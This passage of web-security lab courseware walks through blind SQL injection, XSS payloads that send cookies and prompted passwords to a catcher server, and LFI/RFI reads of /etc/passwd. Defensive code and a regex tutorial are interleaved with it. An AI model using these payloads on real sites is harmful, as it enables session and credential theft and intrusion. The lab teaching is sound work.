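    """Map each probe to (concatenated result, parameterized result)."""
    return {
        probe: (
            outcome(lookup_concatenated, db, probe),
            outcome(lookup_parameterized, db, probe),
        )
        for probe in PROBES
    }


if __name__ == "__main__":
    for probe, (weak, hardened) in compare(make_db()).items():
        print("%-14r concatenated=%r parameterized=%r" % (probe, weak, hardened))
```

With concatenation, the quote breaks the statement, the arithmetic is evaluated by the database, and the always-true condition returns every row; the hardened lookup rejects all of them before the database sees the value. Returning a generic error page instead of the exception text closes the separate information leak seen in the error messages above.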
  2262.  
  2263.  
  2264.  
  2265.  
  2266.  
  2267. ###############################
  2268. # Blind SQL Injection Testing #
  2269. ###############################
  2270. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  2271.  
  2272. 3 - Total Characters
  2273. http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  2274. http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  2275. http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
  2276.  
  2277. Let's go for a quick check to see if it's DBO
  2278. http://54.245.184.121/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  2279.  
  2280. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  2281.  
  2282. D - 1st Character
  2283. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  2284. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  2285. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  2286. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  2287.  
  2288. B - 2nd Character
  2289. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2290. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2291.  
  2292. O - 3rd Character
  2293. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2294. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  2295. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2296. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2297. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  2298. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
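The probes in this section leave recognizable request lines in the web server's access log. As an added example (not part of the original courseware; written for Python 3, with constructed log lines and hypothetical rule names), this scanner decodes each query string and tags the UNION, tautology, arithmetic and WAITFOR DELAY patterns shown above, then counts hits per client.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format). The query strings are the
# probes shown in this section, percent-encoded as a browser would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/Mar/2015:10:00:01 +0000] "GET /bookdetail.aspx?id=2 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [31/Mar/2015:10:00:07 +0000] "GET /bookdetail.aspx?id=-2%20union%20all%20select%201,user,@@version,4,5,6,7,8,9-- HTTP/1.1" 200 4801',
    '10.0.0.9 - - [31/Mar/2015:10:00:19 +0000] "GET /bookdetail.aspx?id=2;%20IF%20(LEN(USER)=3)%20WAITFOR%20DELAY%20%2700:00:10%27-- HTTP/1.1" 200 5120',
    '10.0.0.9 - - [31/Mar/2015:10:00:31 +0000] "GET /bookdetail.aspx?id=2;%20IF%20(ASCII(lower(substring((USER),1,1)))=100)%20WAITFOR%20DELAY%20%2700:00:10%27-- HTTP/1.1" 200 5120',
    '10.0.0.9 - - [31/Mar/2015:10:00:40 +0000] "GET /bookdetail.aspx?id=2%20or%201=1-- HTTP/1.1" 200 9000',
    '10.0.0.9 - - [31/Mar/2015:10:00:44 +0000] "GET /bookdetail.aspx?id=(4-2) HTTP/1.1" 200 5120',
    '10.0.0.7 - - [31/Mar/2015:10:01:02 +0000] "GET /search.aspx?q=credit+union+hours HTTP/1.1" 200 2210',
]

# Client address, then the request target between the method and the protocol.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.*) HTTP/\d\.\d"')

# Rule names are hypothetical labels; patterns run on the decoded, lower-cased query.
RULES = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("time_delay", re.compile(r"\bwaitfor\s+delay\b")),
    ("char_probe", re.compile(r"\b(?:ascii|len)\s*\(.*\b(?:substring|user)\b")),
    ("tautology", re.compile(r"\bor\s+\d+\s*(?:=|<>|!=|<|>)\s*-?\d+")),
    ("arithmetic_id", re.compile(r"=\(\s*\d+\s*[-+*/]\s*\d+\s*\)")),
    ("system_object", re.compile(r"@@(?:version|servername)|\bsys\.sql_logins\b|\bdb_name\s*\(")),
]


def classify(line):
    """Return (client, [rule names that fired]) or None if the line is unparsable."""
    m = REQUEST_RE.match(line)
    if m is None:
        return None
    client, target = m.group(1), m.group(2)
    _, _, query = target.partition("?")
    # Decode %xx and '+' first so encoded probes cannot slip past the rules.
    decoded = unquote_plus(query).lower()
    hits = [name for name, rx in RULES if rx.search(decoded)]
    return client, hits


def summarize(lines):
    """Count rule hits per client; clients with no hits are left out."""
    per_client = {}
    for line in lines:
        parsed = classify(line)
        if parsed is None or not parsed[1]:
            continue
        client, hits = parsed
        per_client.setdefault(client, Counter()).update(hits)
    return per_client


if __name__ == "__main__":
    for client, counts in sorted(summarize(SAMPLE_LOG).items()):
        print(client, dict(counts))
```

Repeated time_delay and char_probe hits from one client are the signature of the character-by-character extraction walked through above, since each guessed character costs at least one request.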
  2299.  
  2300.  
  2301.  
  2302.  
  2303.  
  2304.  
  2305.  
  2306.  
  2307.  
  2308.  
  2309. ###############################################################################
  2310. # What is XSS #
  2311. # https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx #
  2312. ###############################################################################
  2313.  
  2314. OK - what is Cross Site Scripting (XSS)
  2315.  
  2316. 1. Use Firefox to browse to the following location:
  2317.  
  2318. http://45.63.104.73/xss_practice/
  2319.  
  2320. A really simple search page that is vulnerable should come up.
  2321.  
  2322.  
  2323.  
  2324.  
  2325. 2. In the search box type:
  2326.  
  2327. <script>alert('So this is XSS')</script>
  2328.  
  2329.  
  2330. This should pop up an alert window with your message in it, proving XSS is in fact possible.
  2331. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  2332.  
  2333.  
  2334. 3. In the search box type:
  2335.  
  2336. <script>alert(document.cookie)</script>
  2337.  
  2338.  
  2339. This should pop up an alert window containing your cookie, proving that XSS is in fact possible and that your cookie can be accessed.
  2340. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  2341.  
  2342. 4. Now replace that alert script with:
  2343.  
  2344. <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  2345.  
  2346.  
  2347. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  2348.  
  2349.  
  2350. 5. Now view the stolen cookie at:
  2351. http://45.63.104.73/xss_practice/cookie_stealer_logs.html
  2352.  
  2353.  
  2354. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  2355.  
  2356.  
  2357.  
  2358.  
  2359.  
  2360.  
  2361. ############################
  2362. # A Better Way To Demo XSS #
  2363. ############################
  2364.  
  2365.  
  2366. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  2367.  
  2368.  
  2369. Use Firefox to browse to the following location:
  2370.  
  2371. http://45.63.104.73/xss_practice/
  2372.  
  2373.  
  2374.  
  2375. Paste this in the search box
  2376. ----------------------------
  2377.  
  2378.  
  2379. Option 1
  2380. --------
  2381.  
  2382. <script>
  2383. password=prompt('Your session is expired. Please enter your password to continue',' ');
  2384. document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
  2385. </script>
  2386.  
  2387.  
  2388. Now view the captured password at:
  2389. http://45.63.104.73/xss_practice/passwords.html
  2390.  
  2391.  
  2392.  
  2393. Option 2
  2394. --------
  2395. <script>
  2396. username=prompt('Please enter your username',' ');
  2397. password=prompt('Please enter your password',' ');
  2398. document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
  2399. </script>
  2400.  
  2401.  
  2402.  
  2403.  
  2404. Now view the captured username and password at:
  2405. http://45.63.104.73/xss_practice/username_password_logs.html
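Every step in this XSS walkthrough works because the search page writes the search term into its HTML unencoded and the cookie is readable from script. As an added example (not the lab's code; written for Python 3, with hypothetical function names and a constructed page layout), here is the reflecting render beside context-aware encoded versions, plus the response headers that limit the damage.

```python
import html
from urllib.parse import quote


def render_search_unsafe(term):
    # Vulnerable pattern: user input is concatenated straight into markup,
    # so a <script> element in the search box becomes part of the page.
    return "<h2>Results for: " + term + "</h2>"


def render_search_safe(term):
    # HTML body context: <, >, &, " and ' become entities and are shown as text.
    return "<h2>Results for: " + html.escape(term, quote=True) + "</h2>"


def render_search_form_safe(term):
    # Attribute context: quote=True matters here, otherwise a double quote in
    # the term would close the value="..." attribute early.
    return ('<input type="text" name="q" value="'
            + html.escape(term, quote=True) + '">')


def render_next_page_link_safe(term, page):
    # URL context: percent-encode the value for the query string first, then
    # HTML-escape the finished URL for the attribute it is placed in.
    href = "/search?q=" + quote(term, safe="") + "&page=" + str(int(page))
    return '<a href="' + html.escape(href, quote=True) + '">next</a>'


def response_headers(session_id):
    # Defence in depth for when an encoding step is missed somewhere:
    #  - HttpOnly keeps the session cookie out of document.cookie
    #  - script-src 'self' stops inline <script> blocks from running
    return [
        ("Content-Type", "text/html; charset=utf-8"),
        ("Set-Cookie", "session=" + quote(session_id, safe="")
                       + "; HttpOnly; Secure; SameSite=Lax; Path=/"),
        ("Content-Security-Policy", "default-src 'self'; script-src 'self'"),
    ]


if __name__ == "__main__":
    term = "<script>alert(document.cookie)</script>"   # input from step 3 above
    print(render_search_unsafe(term))
    print(render_search_safe(term))
    print(render_search_form_safe('he said "hi" & left'))  # constructed input
    print(render_next_page_link_safe("a b&c", 2))           # constructed input
    for name, value in response_headers("abc123"):         # constructed id
        print(name + ": " + value)
```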
  2406.  
  2407.  
  2408.  
  2409. ######################
  2410. # Lesson 27: Web App #
  2411. ######################
  2412. vi wpbruteforcer.py
  2413.  
  2414.  
  2415. python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt
  2416.  
  2417.  
  2418.  
  2419. - Here is an example of an LFI
  2420. - Open this page in Firefox:
  2421. http://45.63.104.73/showfile.php?filename=contactus.txt
  2422.  
  2423. - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
  2424. - Here you see a direct reference to a file on the local filesystem of the victim machine.
  2425. - You can attack this by doing the following:
  2426. http://45.63.104.73/showfile.php?filename=/etc/passwd
  2427.  
  2428. - This is an example of a Local File Include (LFI). To change this attack into a Remote File Include (RFI) you need some content from
  2429. - somewhere else on the Internet. Here is an example of a text file on the web:
  2430. http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  2431.  
  2432. - Now we can attack the target via RFI like this:
  2433. http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  2434.  
  2435.  
  2436. - Now let's see if we can write some code to do this for us:
  2437.  
  2438. vi LFI-RFI.py
  2439.  
  2440.  
  2441.  
  2442. #!/usr/bin/env python
  2443. print "\n### PHP LFI/RFI Detector ###"
  2444. print "### Sean Arries 09/18/09 ###\n"
  2445.  
  2446. import urllib2,re,sys
  2447.  
  2448.  
  2449. TARGET = "http://45.63.104.73/showfile.php?filename=contactus.txt"
  2450. RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
  2451. TravLimit = 12
  2452.  
  2453. print "==> Testing for LFI vulns.."
  2454. TARGET = TARGET.split("=")[0]+"=" ## URL MANIPULATION
  2455. for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
  2456.     TARGET += "../"
  2457.     try:
  2458.         source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
  2459.     except urllib2.URLError, e:
  2460.         print "$$$ We had an Error:",e
  2461.         sys.exit(0)
  2462.     if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
  2463.         print "!! ==> LFI Found:",TARGET+"etc/passwd"
  2464.         break ## BREAK LOOP WHEN VULN FOUND
  2465.  
  2466. print "\n==> Testing for RFI vulns.."
  2467. TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANIPULATION
  2468. try:
  2469.     source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
  2470. except urllib2.URLError, e:
  2471.     print "$$$ We had an Error:",e
  2472.     sys.exit(0)
  2473. if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE
  2474.     print "!! => RFI Found:",TARGET
  2475.  
  2476.  
  2477. print "\nScan Complete\n" ## DONE
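What the detector above finds is a handler that passes the filename parameter to the filesystem (or a URL wrapper) unchecked. As an added example (a Python 3 analogue, not showfile.php's actual code; function names, directory layout and request list are constructed), this shows the trusting resolver beside one that rejects remote references and anything resolving outside the content directory.

```python
import os
import tempfile

# Constructed requests: the local and remote forms from this section plus
# traversal variants, including a sibling directory with a shared name prefix.
REQUESTS = [
    "contactus.txt",
    "/etc/passwd",
    "../secret.cfg",
    "../content-old/contactus.txt",
    "http://example.com/hello.txt",
]


def resolve_unsafe(base_dir, filename):
    # The vulnerable pattern: an absolute path replaces base_dir entirely and
    # "../" walks out of it, so the caller controls which file is opened.
    return os.path.normpath(os.path.join(base_dir, filename))


def resolve_safe(base_dir, filename):
    # Refuse URL-style references (the RFI case) and embedded NUL bytes.
    if "\x00" in filename or "://" in filename:
        raise ValueError("remote or malformed reference rejected")
    # Resolve symlinks and ".." first, then compare whole path components.
    # commonpath() is used instead of startswith(), which would wrongly
    # accept ".../content-old" as being inside ".../content".
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the content directory")
    if not os.path.isfile(candidate):
        raise ValueError("no such file")
    return candidate


def demo():
    """Build a throwaway directory tree and run every request through resolve_safe."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        content = os.path.join(root, "content")
        sibling = os.path.join(root, "content-old")
        os.mkdir(content)
        os.mkdir(sibling)
        for path in (os.path.join(content, "contactus.txt"),
                     os.path.join(sibling, "contactus.txt"),
                     os.path.join(root, "secret.cfg")):
            with open(path, "w") as fh:
                fh.write("constructed sample file\n")
        for name in REQUESTS:
            try:
                resolve_safe(content, name)
                results[name] = "served"
            except ValueError as exc:
                results[name] = "blocked: " + str(exc)
    return results


if __name__ == "__main__":
    for name in REQUESTS:
        print("unsafe ->", resolve_unsafe("/var/www/content", name))
    for name, verdict in demo().items():
        print("safe   ->", name, "=>", verdict)
```

Where the set of servable files is small and fixed, mapping the parameter through an allowlist of known names is stricter still than path containment.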
  2478.  
  2479.  
  2480.  
  2481.  
  2482.  
  2483.  
  2484.  
  2485.  
  2486.  
  2487.  
  2488. #!/usr/bin/env python
  2489. print "\n### PHP SQLi Detector ###"
  2490. print "### Sean Arries 09/18/09 ###\n"
  2491.  
  2492. import urllib2,re,sys
  2493.  
  2494. TARGET = "http://45.63.104.73/acre2.php?lap=Compaq"
  2495. SQLi = "'"
  2496. SQLiError = "You have an error in your SQL"
  2497. SQLiNull = "BennyLava"
  2498.  
  2499. print "==> Testing for SQLi Error Vuln..."
  2500. URL = TARGET+SQLi
  2501. try:
  2502.     source = urllib2.urlopen(URL).read() ## WEB REQUEST
  2503. except urllib2.URLError, e:
  2504.     print "$$$ We had an Error\n",e
  2505.     sys.exit(0)
  2506. if re.search(SQLiError,source): ## SEARCH FOR ERROR IN PAGE
  2507.     print "!! ==> SQLi Found:",TARGET+SQLi
  2508.     print "## ==> Bruting NULL column...",
  2509.     URL = TARGET+"+and+1=2+UNION+SELECT+" ## BUILD OUR SQLi STATEMENT
  2510.     for x in xrange(1,99):
  2511.         if x > 1:
  2512.             URL = URL+","
  2513.         URL = URL+"0x"+SQLiNull.encode("hex") ## ADD HEX ENCODED NULL WORD
  2514.         print x,
  2515.         try:
  2516.             source = urllib2.urlopen((URL+"-- n")).read() ## WEB REQUEST
  2517.         except urllib2.URLError, e:
  2518.             print "$$$ We had an Error\n",e
  2519.             sys.exit(0)
  2520.         if re.search(SQLiNull,source): ## SEARCH FOR UNENCODED NULL WORD
  2521.             print "\n!! ==> Null Column Found:",URL+"--"
  2522.             break
  2523. else:
  2524.     print "** ==> No SQLi Found!"
  2525. print "\nScan Complete\n"
  2526.  
  2527. #######################
  2528. # Regular Expressions #
  2529. #######################
  2530.  
  2531.  
  2532.  
  2533. **************************************************
  2534. * What is Regular Expression and how is it used? *
  2535. **************************************************
  2536.  
  2537.  
  2538. Simply put, a regular expression is a sequence of characters mainly used to find and replace patterns in a string or file.
  2539.  
  2540.  
  2541. Regular expressions use two types of characters:
  2542.  
  2543. a) Meta characters: As the name suggests, these characters have a special meaning, similar to * in wildcard.
  2544.  
  2545. b) Literals (like a,b,1,2…)
  2546.  
  2547.  
  2548. In Python, the "re" module provides regular expression support, so you need to import re before you can use regular expressions.
  2549.  
  2550.  
  2551. Use this code --> import re
  2552.  
  2553.  
  2554.  
  2555.  
  2556. The most common uses of regular expressions are:
  2557. --------------------------------------------------
  2558.  
  2559. - Search a string (search and match)
  2560. - Find a string (findall)
  2561. - Break a string into substrings (split)
  2562. - Replace part of a string (sub)
  2563.  
  2564.  
  2565.  
  2566. Let's look at the methods that library "re" provides to perform these tasks.
  2567.  
  2568.  
  2569.  
  2570. ****************************************************
  2571. * What are various methods of Regular Expressions? *
  2572. ****************************************************
  2573.  
  2574.  
  2575. The "re" package provides multiple methods to perform queries on an input string. Here are the most commonly used methods, which I will discuss:
  2576.  
  2577. re.match()
  2578. re.search()
  2579. re.findall()
  2580. re.split()
  2581. re.sub()
  2582. re.compile()
  2583.  
  2584. Let's look at them one by one.
  2585.  
  2586.  
  2587. re.match(pattern, string):
  2588. -------------------------------------------------
  2589.  
  2590. This method finds a match only if it occurs at the start of the string. For example, calling match() on the string 'AV Analytics AV' and looking for the pattern 'AV' will match. However, if we look for only 'Analytics', the pattern will not match. Let's perform it in Python now.
  2591.  
  2592. Code
  2593.  
  2594. import re
  2595. result = re.match(r'AV', 'AV Analytics ESET AV')
  2596. print result
  2597.  
  2598. Output:
  2599. <_sre.SRE_Match object at 0x0000000009BE4370>
  2600.  
  2601. Above, it shows that a pattern match has been found. To print the matching string we'll use the method group(), which returns the matching string. Use "r" at the start of the pattern string; it designates a Python raw string.
  2602.  
  2603.  
  2604. result = re.match(r'AV', 'AV Analytics ESET AV')
  2605. print result.group(0)
  2606.  
  2607. Output:
  2608. AV
  2609.  
  2610.  
  2611. Let's now find 'Analytics' in the given string. Here we see that the string does not start with 'Analytics', so it should return no match. Let's see what we get:
  2612.  
  2613.  
  2614. Code
  2615.  
  2616. result = re.match(r'Analytics', 'AV Analytics ESET AV')
  2617. print result
  2618.  
  2619.  
  2620. Output:
  2621. None
  2622.  
  2623.  
  2624. There are methods like start() and end() to know the start and end position of the matching pattern in the string.
  2625.  
  2626. Code
  2627.  
  2628. result = re.match(r'AV', 'AV Analytics ESET AV')
  2629. print result.start()
  2630. print result.end()
  2631.  
  2632. Output:
  2633. 0
  2634. 2
  2635.  
  2636. Above you can see the start and end position of the matching pattern 'AV' in the string; this sometimes helps a lot when manipulating the string.
  2637.  
  2638.  
  2639.  
  2640.  
  2641.  
  2642. re.search(pattern, string):
  2643. -----------------------------------------------------
  2644.  
  2645.  
  2646. It is similar to match() but it doesn't restrict us to finding matches at the beginning of the string only. Unlike the previous method, here searching for the pattern 'Analytics' will return a match.
  2647.  
  2648. Code
  2649.  
  2650. result = re.search(r'Analytics', 'AV Analytics ESET AV')
  2651. print result.group(0)
  2652.  
  2653. Output:
  2654. Analytics
  2655.  
  2656. Here you can see that the search() method is able to find a pattern at any position in the string, but it only returns the first occurrence of the search pattern.
  2657.  
  2658.  
  2659.  
  2660.  
  2661.  
  2662.  
  2663. re.findall(pattern, string):
  2664. ------------------------------------------------------
  2665.  
  2666.  
  2667. It returns a list of all matches. It has no constraint of searching from the start or end. If we use findall to search for 'AV' in the given string, it will return both occurrences of AV. When searching a string, I would recommend always using re.findall(); it can work like both re.search() and re.match().
  2668.  
  2669.  
  2670. Code
  2671.  
  2672. result = re.findall(r'AV', 'AV Analytics ESET AV')
  2673. print result
  2674.  
  2675. Output:
  2676. ['AV', 'AV']
  2677.  
  2678.  
  2679.  
  2680.  
  2681.  
  2682. re.split(pattern, string, [maxsplit=0]):
  2683. ------------------------------------------------------
  2684.  
  2685.  
  2686.  
  2687. This method helps to split a string by the occurrences of the given pattern.
  2688.  
  2689.  
  2690. Code
  2691.  
  2692. result=re.split(r'y','Analytics')
  2693. result
  2694.  
  2695. Output:
  2696. ['Anal', 'tics']
  2697.  
  2698. Above, we have split the string "Analytics" by "y". Method split() has another argument "maxsplit". It has a default value of zero, in which case it does the maximum number of splits that can be done; if we give maxsplit a value, it will split the string at most that many times. Let's look at the example below:
  2699.  
  2700.  
  2701. Code
  2702.  
  2703. result=re.split(r's','Analytics eset')
  2704. print result
  2705.  
  2706. Output:
  2707. ['Analytic', 'e', 'et'] #It has performed all the splits that can be done by pattern "s".
  2708.  
  2709. Code
  2710.  
  2711. result=re.split(r's','Analytics eset',maxsplit=1)
  2712. result
  2713.  
  2714. Output:
  2715. ['Analytic', 'eset']
  2716.  
  2717. Here, you can notice that we have fixed maxsplit to 1. As a result, it returns only two values, whereas the first example returns three.
  2718.  
  2719.  
  2720.  
  2721.  
  2722. re.sub(pattern, repl, string):
  2723. ----------------------------------------------------------
  2724.  
  2725. It helps to search for a pattern and replace it with a new substring. If the pattern is not found, the string is returned unchanged.
  2726.  
  2727. Code
  2728.  
  2729. result=re.sub(r'Ruby','Python','Joe likes Ruby')
  2730. result
  2731. Output:
  2732. 'Joe likes Python'
  2733.  
  2734.  
  2735.  
  2736.  
  2737.  
  2738. re.compile(pattern):
  2739. ----------------------------------------------------------
  2740.  
  2741.  
  2742. We can compile a regular expression pattern into a pattern object, which can be used for pattern matching. It also helps to search for a pattern again without rewriting it.
  2743.  
  2744.  
  2745. Code
  2746.  
  2747. import re
  2748. pattern=re.compile('XSS')
  2749. result=pattern.findall('XSS is Cross Site Scripting, XSS')
  2750. print result
  2751. result2=pattern.findall('XSS is Cross Site Scripting, SQLi is Sql Injection')
  2752. print result2
  2753. Output:
  2754. ['XSS', 'XSS']
  2755. ['XSS']
  2756.  
  2757. Till now, we looked at various methods of regular expression using a constant pattern (fixed characters). But, what if we do not have a constant search pattern and we want to return specific set of characters (defined by a rule) from a string? Don't be intimidated.
  2758.  
  2759. This can easily be solved by defining an expression with the help of pattern operators (meta and literal characters). Let's look at the most common pattern operators.
  2760.  
  2761.  
  2762.  
  2763.  
  2764.  
  2765. **********************************************
  2766. * What are the most commonly used operators? *
  2767. **********************************************
  2768.  
  2769.  
  2770. Regular expressions can specify patterns, not just fixed characters. Here are the most commonly used operators that help to generate an expression to represent required characters in a string or file. They are commonly used in web scraping and text mining to extract required information.
  2771. 
  2772. Operators     Description
  2773. .             Matches any single character except newline '\n'.
  2774. ?             Matches 0 or 1 occurrence of the pattern to its left
  2775. +             1 or more occurrences of the pattern to its left
  2776. *             0 or more occurrences of the pattern to its left
  2777. \w            Matches an alphanumeric character, whereas \W (upper case W) matches a non-alphanumeric character.
  2778. \d            Matches digits [0-9], and \D (upper case D) matches non-digits.
  2779. \s            Matches a single whitespace character (space, newline, return, tab, form feed), and \S (upper case S) matches any non-whitespace character.
  2780. \b            Boundary between word and non-word; \B is the opposite of \b
  2781. [..]          Matches any single character in the square brackets, and [^..] matches any single character not in the square brackets
  2782. \             Escapes characters with special meaning, like \. to match a period or \+ for a plus sign.
  2783. ^ and $       ^ and $ match the start or end of the string respectively
  2784. {n,m}         Matches at least n and at most m occurrences of the preceding expression; written as {,m} it matches from 0 up to m occurrences.
  2785. a|b           Matches either a or b
  2786. ( )           Groups regular expressions and returns matched text
  2787. \t, \n, \r    Matches tab, newline, return
  2788.  
  2789.  
  2790. For more details on the meta characters "(", ")", "|" and others, you can refer to this link (https://docs.python.org/2/library/re.html).
  2791.  
  2792. Now, let's understand the pattern operators by looking at the below examples.
  2793.  
  2794.  
  2795.  
  2796. ****************************************
  2797. * Some Examples of Regular Expressions *
  2798. ****************************************
  2799.  
  2800. ******************************************************
  2801. * Problem 1: Return the first word of a given string *
  2802. ******************************************************
  2803.  
  2804.  
  2805. Solution-1 Extract each character (using "\w")
  2806. ---------------------------------------------------------------------------
  2807.  
  2808. Code
  2809.  
  2810. import re
  2811. result=re.findall(r'.','Python is the best scripting language')
  2812. print result
  2813.  
  2814. Output:
  2815. ['P', 'y', 't', 'h', 'o', 'n', ' ', 'i', 's', ' ', 't', 'h', 'e', ' ', 'b', 'e', 's', 't', ' ', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', ' ', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']
  2816.  
  2817.  
  2818. Above, space is also extracted, now to avoid it use "\w" instead of ".".
  2819.  
  2820.  
  2821. Code
  2822.  
  2823. result=re.findall(r'\w','Python is the best scripting language')
  2824. print result
  2825.  
  2826. Output:
  2827. ['P', 'y', 't', 'h', 'o', 'n', 'i', 's', 't', 'h', 'e', 'b', 'e', 's', 't', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']
  2828.  
  2829.  
  2830.  
  2831.  
  2832. Solution-2 Extract each word (using "*" or "+")
  2833. ---------------------------------------------------------------------------
  2834.  
  2835. Code
  2836.  
  2837. result=re.findall(r'\w*','Python is the best scripting language')
  2838. print result
  2839.  
  2840. Output:
  2841. ['Python', '', 'is', '', 'the', '', 'best', '', 'scripting', '', 'language', '']
  2842.  
  2843.  
  2844. Again, it is returning empty strings where the spaces are, because "*" returns zero or more matches of the pattern to its left. Now to remove them we will go with "+".
  2845.  
  2846. Code
  2847.  
  2848. result=re.findall(r'\w+','Python is the best scripting language')
  2849. print result
  2850. Output:
  2851. ['Python', 'is', 'the', 'best', 'scripting', 'language']
  2852.  
  2853.  
  2854.  
  2855.  
  2856.  
  2857. Solution-3 Extract the first word (using "^")
  2858. -------------------------------------------------------------------------------------
  2859.  
  2860.  
  2861. Code
  2862.  
  2863. result=re.findall(r'^\w+','Python is the best scripting language')
  2864. print result
  2865.  
  2866. Output:
  2867. ['Python']
  2868.  
  2869. If we use "$" instead of "^", it will return the word from the end of the string. Let's look at it.
  2870.  
  2871. Code
  2872.  
  2873. result=re.findall(r'\w+$','Python is the best scripting language')
  2874. print result
  2875. Output:
  2876. ['language']
  2877.  
  2878.  
  2879.  
  2880.  
  2881.  
  2882. ***********************************************************
  2883. * Problem 2: Return the first two characters of each word *
  2884. ***********************************************************
  2885.  
  2886.  
  2887.  
  2888.  
  2889. Solution-1 Extract consecutive two characters of each word, excluding spaces (using "\w")
  2890. ------------------------------------------------------------------------------------------------------
  2891.  
  2892. Code
  2893.  
  2894. result=re.findall(r'\w\w','Python is the best')
  2895. print result
  2896.  
  2897. Output:
  2898. ['Py', 'th', 'on', 'is', 'th', 'be', 'st']
  2899.  
  2900.  
  2901.  
  2902.  
  2903.  
  2904.  
  2905. Solution-2 Extract the two consecutive characters at the start of each word boundary (using "\b")
  2906. ------------------------------------------------------------------------------------------------------
  2907.  
  2908. Code
  2909.  
  2910. result=re.findall(r'\b\w.','Python is the best')
  2911. print result
  2912.  
  2913. Output:
  2914. ['Py', 'is', 'th', 'be']
  2915.  
  2916.  
  2917.  
  2918.  
  2919.  
  2920.  
  2921. ********************************************************
  2922. * Problem 3: Return the domain type of given email-ids *
  2923. ********************************************************
  2924.  
  2925.  
  2926. To explain it in simple manner, I will again go with a stepwise approach:
  2927.  
  2928.  
  2929.  
  2930.  
  2931.  
  2932. Solution-1 Extract all characters after "@"
  2933. ------------------------------------------------------------------------------------------------------------------
  2934.  
  2935. Code
  2936.  
  2937. result=re.findall(r'@\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
  2938. print result
  2939.  
  2940. Output: ['@gmail', '@test', '@strategicsec', '@rest']
  2941.  
  2942.  
  2943.  
  2944. Above, you can see that the ".com", ".biz" part is not extracted. To add it, we will go with the code below.
  2945.  
  2946.  
